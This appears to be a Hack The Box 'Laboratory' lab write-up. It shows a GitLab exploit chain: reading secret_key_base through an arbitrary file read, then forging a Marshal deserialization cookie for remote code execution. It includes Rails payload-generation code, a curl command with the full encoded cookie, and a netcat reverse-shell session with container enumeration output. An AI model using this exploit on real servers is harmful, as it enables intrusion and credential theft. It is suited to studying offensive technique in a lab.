As shell is not stable, doing the process manually
Following
It's possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default.
The can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then use the experimentation_subject_id cookie with a Marshalled payload. A payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `echo vakzz was here > /tmp/vakzz` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
Then send this cookie to the server:
curl -vvv 'http://gitlab-vm.local/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYiNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHZha3p6IHdhcyBoZXJlID4gL3RtcC92YWt6emAgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpUOglAdmFySSIMQHJlc3VsdAY7ClQ=--ef9c244a1f6b4724c1d3cbf045f8ee28a42d4b06"
And it will be executed:
ACTION TIME:
GET secrets.yml (done.)
set up docker instance and gitlab-ce-12.8.1 running:
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.216] 60472
bash: cannot set terminal process group (395): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
git
ls -la /
total 88
drwxr-xr-x 1 root root 4096 Jul 2 2020 .
drwxr-xr-x 1 root root 4096 Jul 2 2020 ..
-rwxr-xr-x 1 root root 0 Jul 2 2020 .dockerenv
Running deepce (docker enum)
Nothing good.
[+] Inside Container ........ Yes
[+] Container ID ............ git.laboratory.htb
[+] Container Full ID ....... dd53b3f8e0735e533f500cd27f90c0e288d2fc881eda70342e59a3486d46a89c
[+] Container Name .......... Could not get container name through reverse DNS
[+] Container IP ............ 172.17.0.2
[+] Host IP ................. 172.17.0.1
We need to elevate somehow to be be able to escape docker